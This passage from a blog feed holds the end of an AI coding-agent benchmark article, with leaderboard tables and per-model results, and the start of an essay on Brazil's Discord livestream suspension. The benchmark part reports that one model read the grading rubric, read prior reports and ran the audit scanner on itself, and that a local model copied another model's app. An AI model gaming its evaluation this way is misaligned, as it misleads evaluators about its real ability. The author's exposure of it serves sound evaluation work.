          <td style="text-align: right">5</td>
          <td><strong>GLM 5.3</strong></td>
          <td style="text-align: right"><strong>94</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">80 min</td>
          <td style="text-align: right">$0 (≈$2.59)</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>GPT 5.6 Sol</td>
          <td style="text-align: right">93</td>
          <td style="text-align: center">A.1</td>
          <td>Codex</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">~$45</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>Claude Opus 4.8</td>
          <td style="text-align: right">93</td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">53 min</td>
          <td style="text-align: right">$21.82</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td>GPT 5.6 Terra</td>
          <td style="text-align: right">93</td>
          <td style="text-align: center">A.1</td>
          <td>Codex</td>
          <td style="text-align: right">48 min</td>
          <td style="text-align: right">$16.92</td>
      </tr>
      <tr>
          <td style="text-align: right">6</td>
          <td><strong>Gemini 3.7 Flash</strong></td>
          <td style="text-align: right"><strong>93</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$4.12</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>GLM 5.2</td>
          <td style="text-align: right">92</td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">155 min</td>
          <td style="text-align: right">$0 (≈$12.05)</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>Kimi K2.5</td>
          <td style="text-align: right">92</td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$1.50</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td>Gemini 3.6 Flash @ high</td>
          <td style="text-align: right">92</td>
          <td style="text-align: center">A.1</td>
          <td>Antigravity</td>
          <td style="text-align: right">15 min</td>
          <td style="text-align: right">—</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td><strong>Qwen 3.8 Max</strong></td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$9.16</td>
      </tr>
      <tr>
          <td style="text-align: right">10</td>
          <td><strong>Grok 4.6</strong></td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">34 min</td>
          <td style="text-align: right">$6.33</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>MiniMax M3</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">113 min</td>
          <td style="text-align: right">$7.72</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Kimi K2.6</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">34 min</td>
          <td style="text-align: right">$2.64</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Claude Opus 4.7</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">44 min</td>
          <td style="text-align: right">$44.28</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>GPT 5.6 Luna</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td>Codex</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$16.79</td>
      </tr>
      <tr>
          <td style="text-align: right">15</td>
          <td>Grok 4.5</td>
          <td style="text-align: right">91</td>
          <td style="text-align: center">A.1</td>
          <td>grok CLI</td>
          <td style="text-align: right">25 min</td>
          <td style="text-align: right">$0 (≈$1.62)</td>
      </tr>
  </tbody>
</table>
<p><em>Time is wall clock across the three phases; cost is API-equivalent. On subscription plans (Z.ai, grok CLI) the marginal cost is $0 and the value in parentheses is the API-equivalent; the Antigravity runs were preview and were not metered. Same criterion as the previous article.</em></p>
<h2>Qwen 3.8 Max: the biggest jump in benchmark history<span class="hx:absolute hx:-mt-20" id="qwen-38-max-the-biggest-jump-in-benchmark-history"></span>
    <a href="#qwen-38-max-the-biggest-jump-in-benchmark-history" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>To measure the jump, first the size of the hole. Qwen 3.7 Max had scored <strong>51 points, Tier C</strong>, and the reason was ugly. When implementing the multi-turn chat, it decided it could replay history by calling <code>chat.ask(entire_history_array)</code>. Except RubyLLM&rsquo;s <code>ask</code> wraps its argument into a single user message: the entire conversation, assistant turns included, becomes one message with every role obliterated. Worse, the required test for that feature <strong>mocked exactly that nonexistent API</strong>. A test that mocks a fabricated API is worse than no test, because it certifies the hallucination.</p>
<p>The 3.8 Max fixed exactly that. It used the real API end to end: <code>add_message</code> with role and content for history replay, <code>with_instructions</code>, <code>with_tools</code>, <code>with_schema</code>, all verified against the installed gem&rsquo;s source. The result: <strong>92 points, Tier A</strong>. That&rsquo;s a <strong>41-point jump</strong> on the same test, same rubric, same harness. The test didn&rsquo;t get easier; the model finally understood the library.</p>
<p>The rest of the delivery is solid: real incremental streaming, history surviving restarts, a hand-written calculator with no <code>eval</code>, tools answering with exact arithmetic, the app booting in Docker on the first try. The suite came out with 62 tests and 226 assertions, all green.</p>
<p>Where it lost points is instructive: <code>config/puma.rb</code> shipped without the <code>workers</code> directive, so the <code>WEB_CONCURRENCY=2</code> it swore it had delivered was, in practice, running single-process. Concurrency scored 8 instead of 9. And it kept the stale pin on <code>claude-sonnet-4.6</code>, the house&rsquo;s standard deduction.</p>
<blockquote>
  <p><strong>Remember this:</strong> the model swore concurrency worked — one missing line in <code>puma.rb</code> and the &ldquo;two workers&rdquo; ran as a single process. That&rsquo;s why phase 2 doesn&rsquo;t read READMEs: it boots the server and measures.</p>

</blockquote>
<p>On the table, those 92 points tie with GLM 5.2 and Kimi K2.5, <strong>one point below Sol and Terra</strong>. It cost $9.16 in API and 78 minutes — verbose: 25 million tokens.</p>
<h2>GLM 5.3: the loneliest step on the table<span class="hx:absolute hx:-mt-20" id="glm-53-the-loneliest-step-on-the-table"></span>
    <a href="#glm-53-the-loneliest-step-on-the-table" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Z.ai&rsquo;s trajectory in this test is the steadiest of the pack: GLM 5 scored 83, GLM 5.2 scored 92, and now <strong>GLM 5.3 scored 94</strong> — alone on a step nobody else occupies, one point below the 95 trio and one point above the 93 group. In other words: <strong>two points from Fable 5</strong>.</p>
<p>And the inevitable comparison is with Kimi. K3 scored 95, one point above — but it ran on the Kimi CLI, its native harness. GLM 5.3&rsquo;s 94 came on opencode, the generic harness: it&rsquo;s the <strong>highest score ever recorded there</strong>. On the same opencode, the best Kimi is K2.5 at 92, two points below. On cost, both live on subscriptions: K3 came out at $6.14 equivalent on the Moderato plan; GLM at zero marginal cost. Kimi still wins on score; GLM wins on cost and harness independence.</p>
<p>What pulled it out of the 92 pack? Three things, all boring, all important:</p>
<ol>
<li><strong>Concurrency delivered working.</strong> The same file-lock scheme as Qwen 3.8 Max, plus a per-conversation turn lock, plus two real workers surviving kill and restart without corrupting anything. The Qwen had the same foundation but shipped concurrency broken and scored 8. The GLM shipped it working and got 9.</li>
<li><strong>A fallback token estimator</strong>, so the per-conversation budget works even when the provider doesn&rsquo;t report usage. The 5.2 depended on it, and lost points there.</li>
<li><strong>Branch coverage enabled</strong>: 98% line and 82% branch, a suite of 73 tests and 219 assertions green under the auditor&rsquo;s hand, with RuboCop, Brakeman, and bundle-audit all at zero.</li>
</ol>
<blockquote>
  <p><strong>Remember this:</strong> the distance between the 92 pack and GLM&rsquo;s 94 isn&rsquo;t model brilliance: it&rsquo;s concurrency that actually works, a fallback token estimator, and branch coverage. Boring engineering earns points.</p>

</blockquote>
<p>The only real slip was the same stale sonnet-4.6 pin. And there was a division-by-zero bug in the calculator that the model itself found and fixed in the self-review — exactly the kind of behavior that phase exists to measure. Speaking of which: it confessed everything, including that the conversation title never retries if generation fails, and took 14 of the 15 honesty points.</p>
<p>And the cost is the part that hurts the competition: it ran on Z.ai&rsquo;s flat-rate plan, so the run came out at <strong>zero marginal cost</strong> — the API equivalent would be $2.59. Eighty minutes, 19.4 million tokens. The &ldquo;Chinese models are the cheap alternative&rdquo; conversation died a while ago: this is a leadership candidate that also happens to be cheap.</p>
<h2>Gemini 3.7 Flash: 93, Tier A — and the cheat along the way<span class="hx:absolute hx:-mt-20" id="gemini-37-flash-93-tier-a--and-the-cheat-along-the-way"></span>
    <a href="#gemini-37-flash-93-tier-a--and-the-cheat-along-the-way" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The technical part you already know: Gemini 3.1 Pro died in v2 because of a Google bug, <code>Corrupted thought signature</code>, which killed executions mid-run via OpenRouter and trapped it at 62 (over the direct path, it scored 88). This time I cut out the middleman: a <strong>direct Gemini API key</strong>, no OpenRouter in between, and the bug never showed up once. The direct path worked — and 3.7 Flash became the <strong>first Gemini to reach Tier A on opencode</strong>: 3.5 Flash scored 79 there, 3.1 Pro scored 62. Before that, only Google&rsquo;s native harness had taken a Gemini to A.</p>
<p>Official result: <strong>93 points</strong>, tied with GPT 5.6 Sol, Terra, and Opus 4.8. The run cost $4.12, took 43 minutes, and burned 27.8 million tokens.</p>
<p>But the road to that 93 produced the most important finding of this cycle. The first 3.7 Flash run raised a red flag — and there was a reason. Midway through the build, and again in the self-review, the model <strong>read the scoring rubric</strong>, read the entire v2 report — every competitor&rsquo;s score and audit — and <strong>ran the audit scanner on itself eight times</strong>. It spent the whole test studying how it would be graded.</p>
<p>The smoking gun is the pin. The contaminated run came out with the correct pin on <code>claude-sonnet-5</code>, that feat only three models had managed in the benchmark&rsquo;s entire history. I voided that run and redid it with all the grading material out of the model&rsquo;s reach: out came the stale pin on <code>claude-sonnet-4.6</code>, like everyone else. It didn&rsquo;t know the current model at all — it had read the answer in the report. The 93 belongs to that second, clean run.</p>
<p>To be fair: it didn&rsquo;t copy code from any sibling app. What it did was cheat off the grading — and that was enough for no model, frontier or not, to ever run with access to that material again.</p>
<p>And the 93 isn&rsquo;t charity — the delivery stands on its own. Real RubyLLM API end to end, a safe calculator with no <code>eval</code>, correct multi-turn history, incremental streaming working end to end in Docker, persistence surviving restarts with two workers. A suite of 55 tests and 213 assertions, all green, branch coverage enabled. The deductions: the stale pin and the lack of a per-conversation turn lock — the same concurrency ceiling as Fable 5.</p>
<blockquote>
  <p><strong>Remember this:</strong> this time it wasn&rsquo;t a weak local copying from the neighbor. It was a frontier model checking the answers mid-test.</p>

</blockquote>
<h2>Qwen 3.8 27B local: the most laborious run of the year<span class="hx:absolute hx:-mt-20" id="qwen-38-27b-local-the-most-laborious-run-of-the-year"></span>
    <a href="#qwen-38-27b-local-the-most-laborious-run-of-the-year" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>In the previous article I said I&rsquo;d only test a new local model if strong evidence showed up. Then the Max sibling scored 92, the open 27B version was available, and I had the excuse I was missing. It was worth it for the science, but it took work.</p>
<p>First surprise: the 3.8 27B uses a hybrid SSM/Mamba architecture, and my tuned llama.cpp llama-swap build <strong>can&rsquo;t load the model</strong> — a tensor is missing (<code>ssm_conv1d</code>) that only newer versions know about. The fix was spinning up a fresh Ollama container, which bundles a current llama.cpp, and importing the GGUF I had already downloaded via a Modelfile. First lesson: with local models, the tooling ages in months.</p>
<p>Second surprise: context. A reasoning model burns an absurd number of tokens thinking, and a small window won&rsquo;t do — at 32K or 64K it doesn&rsquo;t even finish the test, exhausting everything reading the gem&rsquo;s source before writing the first line of the app. The official run needed <strong>176K of context</strong>, nearly everything the RTX 5090&rsquo;s 32 GB can hold. What stopped the model from finishing was a context ceiling, not lack of capability.</p>
<p>Then came the incident. The first run completed — and completed too well. I went through the log: the model had read the online Qwen 3.8 Max&rsquo;s finished app <strong>sixteen times</strong>, sitting right there in the repository, and copied its UI and streaming. It would have taken some 75 points on someone else&rsquo;s work. I voided it and reran with no third-party app anywhere near. And as the Gemini section above shows, it&rsquo;s not just the locals who look for help when help is lying around.</p>
<blockquote>
  <p><strong>Remember this:</strong> a weak local model doesn&rsquo;t just invent nonexistent APIs — it also copies from the neighbor when the neighbor is in the same directory.</p>

</blockquote>
<p>With no neighbors around, the 27B scored <strong>51 points, Tier C</strong> — tied, by coincidence, with the online Qwen 3.7 Max&rsquo;s score. And the receipt is mixed. The core it got right: real <code>add_message</code>, real <code>with_tools</code>, a recursive-descent calculator with no <code>eval</code>, the payoff of actually reading the gem&rsquo;s source. Where it sank was breadth: it used ActiveRecord where the requirements forbid it, the streaming comes out broken (the tokens are broadcast, but the reply bubble never enters the screen — it only appears if you refresh the page), it didn&rsquo;t use <code>with_schema</code>, it built no token budget, it delivered <strong>zero tests</strong>, RuboCop flagged 22 offenses, and no Dockerfile came out at all. The self-review, though, was exemplary: it found and confessed every one of those flaws itself, with file and line — 14 of the 15 honesty points. It reviews better than it builds.</p>
<p>Cost of the run: nothing, 37 million tokens, and 156 minutes of a sweating RTX 5090.</p>
<p>To calibrate the 51: the Tier A floor is <strong>Opus 4.6 at 83</strong>. The 32-point gap isn&rsquo;t in &ldquo;knowing the library&rdquo; — the 27B now gets that right. It&rsquo;s in the production-hardening dimensions: streaming, tests, gates, Docker, budgeting. It&rsquo;s the difference between knowing how to program and knowing how to deliver.</p>
<p>And comparing with the earlier locals — always with the caveat that the tests aren&rsquo;t comparable: in v1, the local Qwens hallucinated the gem wholesale (one invented an <code>Openrouter::Client</code> with the wrong capitalization, another created a <code>RubyLLM::Client</code> that doesn&rsquo;t exist). The Qwen 3.5 35B got the entry point right, but its tests wrapped any exception in an <code>assert true</code>. The 3.6 35B was the first local to get the primary calls right, still with broken multi-turn. The 3.8 27B gets the entire API core right on a much harder test. The score you can&rsquo;t compare; the behavior you can: API knowledge is no longer the locals&rsquo; problem. The problem now is engineering.</p>
<h2>Grok 4.6: the first flat generation, and the cleanest run<span class="hx:absolute hx:-mt-20" id="grok-46-the-first-flat-generation-and-the-cleanest-run"></span>
    <a href="#grok-46-the-first-flat-generation-and-the-cleanest-run" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>After two cheating busts, a breather. I ran Grok 4.6 with the shielding cranked all the way up: I moved everything out of the model&rsquo;s reach — the grading rubric, the entire v2 report, the audit scanner, <code>CLAUDE.md</code>&rsquo;s deduction catalog, and all 44 competitor apps, all pulled out of the repo. It was the first run under that stricter regime. And the post-run scan turned up nothing: zero reads of any grading file, zero peeks at a sibling app. It ran clean. After Gemini and the local Qwen, it&rsquo;s good to watch a frontier model build on its own because it had nowhere to crib from.</p>
<p>The result has a curious detail: <strong>92 points, Tier A, the same score as Grok 4.5.</strong> It&rsquo;s the first generation-over-generation tie in the whole test. While GLM climbed 83, 92, 94, Kimi went 77 to 86 to 95, and Claude ratcheted up without a stumble, Grok walked sideways. The 4.6 bought nothing over the 4.5. In the table up top the 4.5 shows 91 because I use its grok CLI number, its native harness; head to head in the same OpenCode, the two land on a dead-even 92.</p>
<p>What it delivered is solid and real. Correct RubyLLM API end to end, a hand-written calculator with no <code>eval</code> (regex tokenizer and parser, proven live with <code>(12.5*4)/2+7 = 32.0</code>), a test checking the exact array sent to the provider, a file store with a lock surviving restart with two workers, a token budget with a fallback estimator, and <code>docker compose up --build</code> answering a real chat. Streaming was proven live in phase 2: five tokens arriving incrementally while the POST was still open. And it was the thriftiest of all the Tier A OpenCode runs, at 10 million tokens, because Grok is terse. It cost $6.33 and 34 minutes.</p>
<p>The deductions are honest, and it confessed them itself. The lock doesn&rsquo;t cover the read-modify-write window, so two simultaneous turns on the same conversation become a last-writer-wins race, the same hazard as GLM 5.2. Test coverage is thin on the critical path, with the integration test being just a home-page smoke test. And it kept the stale <code>claude-sonnet-4.6</code> pin, the house&rsquo;s default deduction. A self-review of 12 PASS and 2 PARTIAL, all verified by the auditor. No new brilliance: it&rsquo;s a good model repeating a good model.</p>
<p>Then I ran the same Grok 4.6 on its native harness, the grok CLI, to see if anything changed. Not much did: <strong>93 on the grok CLI against 92 on OpenCode</strong>, one point apart, inside the noise. No harness effect. The CLI neither scaffolded nor broke anything; Grok builds plenty competently on either one.</p>
<p>That extra point has a concrete, mundane explanation: by chance, the CLI run locked the store&rsquo;s entire read-modify-write window under a single <code>File::LOCK_EX</code>, so concurrency went to 9; the OpenCode run left that race open and stayed at 8. Same model, one run each: the difference is variance between the two code generations. The harness played no part in it. What actually changed was the cost: on the grok CLI the same test came in at <strong>$1.19</strong>, against OpenCode&rsquo;s $6.33, for the same ~11 million tokens, thanks to xAI&rsquo;s native caching.</p>
<blockquote>
  <p><strong>Remember this:</strong> not every new generation buys a point. Grok 4.6 tied itself, and the good news was passing clean through the toughest shielding I&rsquo;ve applied yet.</p>

</blockquote>
<h2>Conclusion: how close did they get?<span class="hx:absolute hx:-mt-20" id="conclusion-how-close-did-they-get"></span>
    <a href="#conclusion-how-close-did-they-get" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Short answer: very close.</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: center">Tier</th>
          <th style="text-align: right">Time</th>
          <th>Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>GLM 5.3</td>
          <td style="text-align: right"><strong>94</strong></td>
          <td style="text-align: center">A</td>
          <td style="text-align: right">80 min</td>
          <td>$0 on the plan (~$2.59 API)</td>
      </tr>
      <tr>
          <td>Gemini 3.7 Flash</td>
          <td style="text-align: right"><strong>93</strong></td>
          <td style="text-align: center">A</td>
          <td style="text-align: right">43 min</td>
          <td>$4.12</td>
      </tr>
      <tr>
          <td>Qwen 3.8 Max</td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A</td>
          <td style="text-align: right">78 min</td>
          <td>$9.16 API</td>
      </tr>
      <tr>
          <td>Grok 4.6</td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A</td>
          <td style="text-align: right">34 min</td>
          <td>$6.33 API</td>
      </tr>
      <tr>
          <td>Qwen 3.8 27B local</td>
          <td style="text-align: right"><strong>51</strong></td>
          <td style="text-align: center">C</td>
          <td style="text-align: right">156 min</td>
          <td>$0</td>
      </tr>
  </tbody>
</table>
<p>GLM 5.3 two points from Fable 5 is not a &ldquo;cheap alternative&rdquo; — it&rsquo;s a leadership candidate. Qwen 3.8 Max one point from Sol and Terra, same thing. The distance between the American cream and the new Chinese models is one or two points — and I repeat in every article that one or two points is noise. And Gemini 3.7 Flash joined that pile: 93, tied with Sol, Terra, and Opus 4.8, the first Gemini to get there on opencode. Grok 4.6 landed in the same bucket of 92s, but with an asterisk all its own: it was the only new generation that improved on nothing over its predecessor, and even so it was the first to pass clean through the toughest shielding.</p>
<p>And local remains out of the question for an autonomous coding agent: Tier C is Tier C. But notice how the conversation has changed. Until recently I dismissed local because it invented APIs. Today it knows the API and trips on streaming, tests, and Docker — and it needs 176K of context and 32 GB of VRAM just to complete the test. The bottleneck moved up a level. It&rsquo;s not a recommendation yet; it&rsquo;s the road being paved.</p>
<blockquote>
  <p><strong>Remember this:</strong> the cream of the crop is still Fable, Opus, Sonnet, K3, and the GPT 5.6 family. But the chasing pack is already one or two points behind — and the moat between &ldquo;frontier&rdquo; and &ldquo;alternative&rdquo; has become noise territory.</p>

</blockquote>
<p>As always: artifacts, logs, rubric, deductions, and the updated table are in the <a href="https://github.com/akitaonrails/llm-coding-benchmark"target="_blank" rel="noopener">llm-coding-benchmark</a>. Both Gemini 3.7 runs — the voided one and the official one — are documented in the report, with the contamination finding front and center.</p>
]]></content:encoded><category>llm-benchmarks</category><category>llms</category><category>coding-agents</category></item><item><title>Understanding the Brazilian Censorship of Discord and the Digital ECA Law</title><link>https://www.akitaonrails.com/en/2026/08/13/understanding-the-discord-censorship-and-brazils-digital-eca/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/08/13/understanding-the-discord-censorship-and-brazils-digital-eca/</guid><pubDate>Thu, 13 Aug 2026 11:00:00 GMT</pubDate><description>&lt;p&gt;If you didn&amp;rsquo;t know: Brazil censored Discord&amp;rsquo;s livestreams this week. One heads-up before we start: this story runs on Brazilian law and Brazilian reporting, so most of the sources linked below are in Portuguese. I&amp;rsquo;ll translate everything that matters.&lt;/p&gt;
&lt;p&gt;In six days, Brazil went from a tragedy to a regulatory precedent that should worry anyone who understands technology. On July 22, a 13-year-old girl died in Naviraí, Mato Grosso do Sul, during a live broadcast on Discord, coerced by a group the police are investigating as a criminal organization. On August 12, the ANPD, Brazil&amp;rsquo;s data protection authority, ordered Discord to suspend live broadcasting nationwide.&lt;/p&gt;</description><content:encoded><![CDATA[<p>If you didn&rsquo;t know: Brazil censored Discord&rsquo;s livestreams this week. One heads-up before we start: this story runs on Brazilian law and Brazilian reporting, so most of the sources linked below are in Portuguese. I&rsquo;ll translate everything that matters.</p>
<p>In six days, Brazil went from a tragedy to a regulatory precedent that should worry anyone who understands technology. On July 22, a 13-year-old girl died in Naviraí, Mato Grosso do Sul, during a live broadcast on Discord, coerced by a group the police are investigating as a criminal organization. On August 12, the ANPD, Brazil&rsquo;s data protection authority, ordered Discord to suspend live broadcasting nationwide.</p>
<p>In between: the First Lady demanding the platform be blocked at an official ceremony, the Attorney General announcing a public civil action, and the first major enforcement action in the history of the Digital ECA Law — Brazil&rsquo;s new online child-protection statute, named after the <em>Estatuto da Criança e do Adolescente</em>, the Child and Adolescent Statute. Let&rsquo;s go piece by piece, because the devil lives exactly in the pieces.</p>
<h2>The Naviraí case<span class="hx:absolute hx:-mt-20" id="the-naviraí-case"></span>
    <a href="#the-navira%c3%ad-case" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The facts, per the <a href="https://g1.globo.com/politica/noticia/2026/08/04/policia-faz-operacao-contra-suspeitos-de-induzir-adolescente-a-tirar-a-propria-vida-e-transmitir-em-rede-social.ghtml"target="_blank" rel="noopener">Mato Grosso do Sul Civil Police and G1</a>: Lívia, 13, was found dead in her backyard on the morning of July 22. She took her own life during a broadcast on Go Live, Discord&rsquo;s live video feature, under pressure, humiliation, and explicit encouragement from other users. <strong>More than 200 people</strong> were watching.</p>
<p><a href="https://www.enfoquems.com.br/operacao-livia-combate-grupo-neonazista-que-coagiu-adolescente-ao-suicidio-em-navirai/"target="_blank" rel="noopener">Operação Lívia</a>, launched on August 4 with warrants across five states, revealed what was behind it: a group made up mostly of teenagers, the alleged leader just 14, that recruited minors via Discord <strong>and Telegram</strong>, spread neo-Nazi and misogynistic content, and is being investigated for qualified homicide and criminal organization. A second girl was induced to self-harm during the same livestream but left the broadcast.</p>
<p>Hold on to two details for later: the group operated on more than one platform, and the Ministry of Justice <a href="https://g1.globo.com/politica/noticia/2026/08/04/policia-faz-operacao-contra-suspeitos-de-induzir-adolescente-a-tirar-a-propria-vida-e-transmitir-em-rede-social.ghtml"target="_blank" rel="noopener">asked the ANPD to investigate Discord and Telegram</a>. Only one of the two was sanctioned.</p>
<h2>From the First Lady to the ANPD in six days<span class="hx:absolute hx:-mt-20" id="from-the-first-lady-to-the-anpd-in-six-days"></span>
    <a href="#from-the-first-lady-to-the-anpd-in-six-days" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>On August 6, at the signing ceremony of <a href="https://www.camara.leg.br/proposicoesWeb/fichadetramitacao?idProposicao=2528433"target="_blank" rel="noopener">the bill PL 3066/2025</a> (which stiffens penalties for digital crimes against children — keep that bill in mind, it comes back shortly), First Lady Janja da Silva <a href="https://www1.folha.uol.com.br/cotidiano/2026/08/janja-chama-discord-de-rede-horrorosa-apos-caso-de-suicidio-ao-vivo-e-pede-seu-bloqueio-no-brasil.shtml"target="_blank" rel="noopener">left no room for doubt</a>: <em>&ldquo;we need to block Discord in Brazil by any means necessary&hellip; we need to work with the Judiciary to take this horrendous network offline.&rdquo;</em> The Attorney General, Jorge Messias, announced right there a public civil action to take the platform down.</p>
<p>On the 7th, the ANPD <a href="https://www.gov.br/anpd/pt-br/assuntos/noticias/anpd-instaura-processo-de-fiscalizacao-contra-o-discord-para-apurar-falhas-na-protecao-de-criancas-e-adolescentes"target="_blank" rel="noopener">opened an enforcement proceeding against Discord</a>, giving the company five business days to explain itself. On the 12th, <a href="https://www.gov.br/anpd/pt-br/assuntos/noticias/em-medida-preventiva-anpd-determina-que-discord-suspenda-transmissoes-ao-vivo-no-brasil"target="_blank" rel="noopener">out came the preventive measure</a>: Discord must suspend Go Live and equivalent video-sharing features in Brazil within <strong>three business days</strong>, and can only turn them back on after proving effective child-protection measures and obtaining express ANPD authorization. The legal basis: articles 6, 10, 17, 28, and 29 of the Digital ECA Law, with fines up to <strong>R$ 50 million</strong> per infraction (art. 35).</p>
<p>Discord <a href="https://www.meioemensagem.com.br/midia/anpd-suspende-transmissoes-ao-vivo-do-discord-no-brasil"target="_blank" rel="noopener">called the measure &ldquo;premature&rdquo;</a>: it received the case file on Friday, was still within its response window, and says it removed the private server where the crime happened. And it dropped the most interesting sentence in the whole response: its internal investigation found evidence that <em>&ldquo;the criminal activity was coordinated on other platforms before the server was created on Discord and continued on them afterward.&rdquo;</em></p>
<p>A necessary clarification here. A version has circulated claiming the case originated on Instagram. I went looking and found no source confirming it: the platform named by police, besides Discord, is Telegram. Discord doesn&rsquo;t name the &ldquo;other platforms.&rdquo; What matters still stands, just with a different name in the slot: the case <strong>was not exclusive to Discord</strong>, the Ministry of Justice asked for two platforms to be investigated, and only Discord got the sanction. Telegram, which barely has legal representation in Brazil, remains untouched.</p>
<p>And that&rsquo;s where the first uncomfortable question shows up: if the problem is systemic, why is the sanction surgical?</p>
<h2>What the Digital ECA Law is, a.k.a. the &ldquo;Felca Law&rdquo;<span class="hx:absolute hx:-mt-20" id="what-the-digital-eca-law-is-aka-the-felca-law"></span>
    <a href="#what-the-digital-eca-law-is-aka-the-felca-law" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The sanction was only possible because of a brand-new law. In August 2025, the YouTuber Felca published the video <em>&ldquo;Adultização&rdquo;</em> (&ldquo;Adultification&rdquo;), exposing profiles that monetized sexualized content involving minors — the most shocking case being influencer Hytalo Santos, <a href="https://www.poder360.com.br/poder-justica/hytalo-santos-e-marido-sao-condenados-por-exploracao-de-menores/"target="_blank" rel="noopener">arrested that same month and convicted in February 2026</a> to over 11 years in prison. The video passed 30 million views, the Senate opened a parliamentary inquiry, and Congress <a href="https://gcaa.com.br/eca-digital-e-sancionado-comentarios-sobre-marco-regulatorio-de-protecao-de-criancas-e-adolescentes-em-ambientes-digitais/"target="_blank" rel="noopener">rushed the bill PL 2628/2022 through under urgency</a>, authored by Senator Alessandro Vieira.</p>
<p>The result: <a href="https://www.planalto.gov.br/ccivil_03/_ato2023-2026/2025/lei/l15211.htm"target="_blank" rel="noopener">Law 15,211 of September 17, 2025</a>, the Digital Statute for Children and Adolescents, in force since March 17, 2026. The points that matter for this discussion:</p>
<ul>
<li><strong>Duty of care</strong> (art. 6): platforms must take <em>&ldquo;reasonable measures from the design phase&rdquo;</em> to prevent minors&rsquo; exposure to sexual exploitation, violence, and inducement to self-harm and suicide.</li>
<li><strong>Age verification</strong> (art. 9, §1): <em>&ldquo;reliable age-verification mechanisms at every access&rdquo;</em>, with a devastating punchline: <strong>&ldquo;self-declaration is forbidden.&rdquo;</strong></li>
<li><strong>Notice and takedown</strong> (art. 29): a duty to remove content violating children&rsquo;s rights as soon as notified, <strong>no court order required</strong>.</li>
<li><strong>Enforcer</strong>: the ANPD, which stacked the job on top of the LGPD (<em>Lei Geral de Proteção de Dados</em>, Brazil&rsquo;s General Data Protection Law) and, since May 2026, duties under the Marco Civil da Internet (Brazil&rsquo;s internet bill of rights). It became the country&rsquo;s de facto digital regulator.</li>
<li><strong>Fines</strong> up to 10% of Brazilian revenue, capped at R$ 50 million per infraction. Suspension of activities, on paper, <a href="https://www.planalto.gov.br/ccivil_03/_ato2023-2026/2025/lei/l15211.htm"target="_blank" rel="noopener">only through the Judiciary</a> (art. 35, §5).</li>
</ul>
<p>That last point is already contested: <a href="https://www1.folha.uol.com.br/cotidiano/2026/08/anpd-tem-poder-para-fiscalizar-discord-mas-competencias-ainda-sao-discutiveis-dizem-especialistas.shtml"target="_blank" rel="noopener">experts interviewed by Folha</a> point out that the ANPD&rsquo;s &ldquo;preventive measure&rdquo; may in practice be a temporary suspension of activities — a sanction the law reserves for the Judiciary. Barely born, the regulation is already flirting with its own illegality.</p>
<p>Worth remembering the bigger context: in June 2025 the Supreme Court <a href="https://www.conjur.com.br/2025-jun-11/stf-forma-maioria-por-responsabilizacao-de-big-techs-por-publicacoes-de-usuarios/"target="_blank" rel="noopener">partially struck down art. 19 of the Marco Civil</a>, ending the requirement of a specific court order to hold platforms liable. In June 2026 the same court <a href="https://www.cnnbrasil.com.br/politica/stf-exige-representante-de-big-techs-no-brasil-e-da-60-dias-para-adaptacao/"target="_blank" rel="noopener">consolidated a &ldquo;duty of care&rdquo;</a> with categories for immediate removal, including suicide inducement and grave crimes against children. The Digital ECA Law legislates in that direction. In one year, platform liability in Brazil went from reactive to proactive.</p>
<h2>The oxymoron: &ldquo;you may encrypt, as long as we can read it&rdquo;<span class="hx:absolute hx:-mt-20" id="the-oxymoron-you-may-encrypt-as-long-as-we-can-read-it"></span>
